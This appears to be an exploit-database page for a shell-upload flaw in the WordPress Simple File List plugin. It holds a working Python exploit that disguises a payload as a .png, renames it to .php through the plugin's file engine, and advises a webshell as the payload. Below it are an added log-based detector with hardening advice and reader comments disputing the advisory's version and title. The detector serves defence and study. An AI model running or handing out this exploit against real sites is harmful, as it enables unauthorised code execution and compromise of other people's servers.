WordPress Simple File List 5.4 Shell Upload

2020.11.02
Credit: H4rk3nz0
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

#!/usr/bin/python
# -*- coding: utf-8 -*-
# Exploit Title: Wordpress Plugin Simple File List 5.4 - Arbitrary File Upload
# Date: 2020-11-01
# Exploit Author: H4rk3nz0 based off exploit by coiffeur
# Original Exploit: https://www.exploit-db.com/exploits/48349
# Vendor Homepage: https://simplefilelist.com/
# Software Link: https://wordpress.org/plugins/simple-file-list/
# Version: Wordpress v5.4 Simple File List v4.2.2

import requests
import random
import hashlib
import sys
import os
import urllib3

urllib3.disable_warnings()

# Plugin paths: where uploads land, the upload handler, and the rename handler
dir_path = '/wp-content/uploads/simple-file-list/'
upload_path = '/wp-content/plugins/simple-file-list/ee-upload-engine.php'
move_path = '/wp-content/plugins/simple-file-list/ee-file-engine.php'

file_name = raw_input('[*] Enter File Name (working directory): ')
protocol = raw_input('[*] Enter protocol (http/https): ')
http = protocol + '://'


def usage():
    banner = """
USAGE: python simple-file-list-upload.py <ip-address>

NOTES: Append :port to IP if required.
       Advise the usage of a webshell as payload.
       Reverseshell payloads can be hit or miss.
"""
    print(banner)


def file_select():
    # Copy the payload to a .png name so it passes the plugin's upload filter
    filename = file_name.split(".")[0] + '.png'
    with open(file_name) as f:
        with open(filename, 'w+') as f1:
            for line in f:
                f1.write(line)
    print('[+] File renamed to ' + filename)
    return filename


def upload(url, filename):
    # Multipart upload to ee-upload-engine.php, then verify the file is reachable
    files = {'file': (filename, open(filename, 'rb'), 'image/png')}
    datas = {
        'eeSFL_ID': 1,
        'eeSFL_FileUploadDir': dir_path,
        'eeSFL_Timestamp': 1587258885,
        'eeSFL_Token': 'ba288252629a5399759b6fde1e205bc2',
    }
    r = requests.post(url=http + url + upload_path, data=datas, files=files, verify=False)
    r = requests.get(url=http + url + dir_path + filename, verify=False)
    if r.status_code == 200:
        print('[+] File uploaded at ' + http + url + dir_path + filename)
        os.remove(filename)
    else:
        print('[-] Failed to upload ' + filename)
        exit(-1)
    return filename


def move(url, filename):
    # Use the plugin's rename action to change the .png extension to .php
    new_filename = filename.split(".")[0] + '.php'
    headers = {
        'Referer': http + url + '/wp-admin/admin.php?page=ee-simple-file-list&tab=file_list&eeListID=1',
        'X-Requested-With': 'XMLHttpRequest',
    }
    datas = {
        'eeSFL_ID': 1,
        'eeFileOld': filename,
        'eeListFolder': '/',
        'eeFileAction': 'Rename|' + new_filename,
    }
    r = requests.post(url=http + url + move_path, data=datas, headers=headers, verify=False)
    if r.status_code == 200:
        print('[+] File moved to ' + http + url + dir_path + new_filename)
    else:
        print('[-] Failed to move ' + filename)
        exit(-1)
    return new_filename


def main(url):
    file_to_upload = file_select()
    uploaded_file = upload(url, file_to_upload)
    moved_file = move(url, uploaded_file)
    if moved_file:
        print('[^-^] Exploit seems to have worked...')
        print('\tURL: ' + http + url + dir_path + moved_file)


if __name__ == '__main__':
    if len(sys.argv) < 2:
        usage()
        exit(-1)
    main(sys.argv[1])
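The script above leaves a recognisable trail in web-server access logs: a POST to ee-upload-engine.php, a POST to the rename handler ee-file-engine.php from the same client shortly afterwards, and then a request for a .php file under /wp-content/uploads/simple-file-list/. The following detector, added here as an example and not part of the advisory or the plugin, parses combined-format access log lines and flags both the bare "PHP served from the uploads directory" signal and the full upload/rename/fetch sequence per client IP. The log lines, IPs and file names are constructed; the three URL paths are the ones the exploit uses.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Paths taken from the exploit above
UPLOAD_ENGINE = "/wp-content/plugins/simple-file-list/ee-upload-engine.php"
FILE_ENGINE = "/wp-content/plugins/simple-file-list/ee-file-engine.php"
UPLOAD_DIR = "/wp-content/uploads/simple-file-list/"

# Apache/nginx "combined" log format (assumed); query string is kept in path and stripped later
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample log: one client runs the full upload -> rename -> fetch sequence,
# a second client only uploads a benign file and never touches a .php in the uploads dir.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Nov/2020:10:15:01 +0000] "POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1" 200 312
203.0.113.7 - - [02/Nov/2020:10:15:02 +0000] "GET /wp-content/uploads/simple-file-list/upload.png HTTP/1.1" 200 1044
203.0.113.7 - - [02/Nov/2020:10:15:03 +0000] "POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1" 200 88
203.0.113.7 - - [02/Nov/2020:10:15:04 +0000] "GET /wp-content/uploads/simple-file-list/upload.php HTTP/1.1" 200 512
198.51.100.9 - - [02/Nov/2020:11:00:00 +0000] "GET /wp-content/uploads/simple-file-list/report.pdf HTTP/1.1" 200 90000
198.51.100.9 - - [02/Nov/2020:11:00:05 +0000] "POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1" 200 312
"""


def parse_line(line):
    """Return a dict (ip, ts, method, path, status) or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["path"] = rec["path"].split("?", 1)[0]   # drop query string
    rec["status"] = int(rec["status"])
    return rec


def php_in_upload_dir(path):
    """True when a PHP file is requested from the plugin's upload directory."""
    return path.startswith(UPLOAD_DIR) and path.lower().endswith(".php")


def analyze(log_text, window=timedelta(minutes=5)):
    """Return findings as (rule, ip, detail) tuples."""
    findings = []
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        # Rule 1: a PHP file served (200) from the uploads directory; legitimate uploads never are
        for r in recs:
            if php_in_upload_dir(r["path"]) and r["status"] == 200:
                findings.append(("php_in_uploads", ip, r["path"]))
        # Rule 2: upload handler, then rename handler, then a .php fetch, all within `window`
        for up in (r for r in recs if r["method"] == "POST" and r["path"] == UPLOAD_ENGINE):
            later = [r for r in recs if up["ts"] <= r["ts"] <= up["ts"] + window]
            renamed = any(r["method"] == "POST" and r["path"] == FILE_ENGINE for r in later)
            fetched = any(php_in_upload_dir(r["path"]) for r in later)
            if renamed and fetched:
                findings.append(("upload_rename_execute", ip, up["ts"].isoformat()))
    return findings


if __name__ == "__main__":
    for rule, ip, detail in analyze(SAMPLE_LOG):
        print("%-22s %-14s %s" % (rule, ip, detail))
```

Rule 1 on its own is the high-confidence signal and is also the one that a hardening control removes entirely: configuring the web server to refuse to execute PHP under /wp-content/uploads turns the renamed file into a dead 403 and makes the rename step pointless. Rule 2 is useful for retroactive hunting where the uploads directory was already locked down, since the upload and rename POSTs still appear even when the final fetch fails.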



Ex.Mi | Date: 2020-11-02 23:42 CET+1
Bruh, the current version of this plugin is 4.2.12. Right here you specified the title as "Wordpress Plugin Simple File List 5.4 - Arbitrary File Upload", on the Exploit-DB as "WordPress Plugin Simple File List 5.4 - Remote Code Execution". You didn't see any difference between AFU and RCE or what? WTF? Mistype or fake vuln?
H4rk3nz0 | Date: 2020-11-06 15:39 CET+1
Hi, noticed a comment and thought I should provide some clarity. The original script this is based on was beyond hit or miss and simply didn't function on a target I was exploiting in OffSec's Proving Grounds. I rewrote large portions of it so it would instead upload a specified file (intended for a webshell payload). I was able to get a foothold with this script and felt it could be of use to someone else. I understand I should have maybe specified the plugin version in the title instead of the WordPress version like the original exploit. I do specify the plugin version in the header comments. Apologies for any confusion. New at this. I will be more clear in future.

Copyright 2025, cxsecurity.com
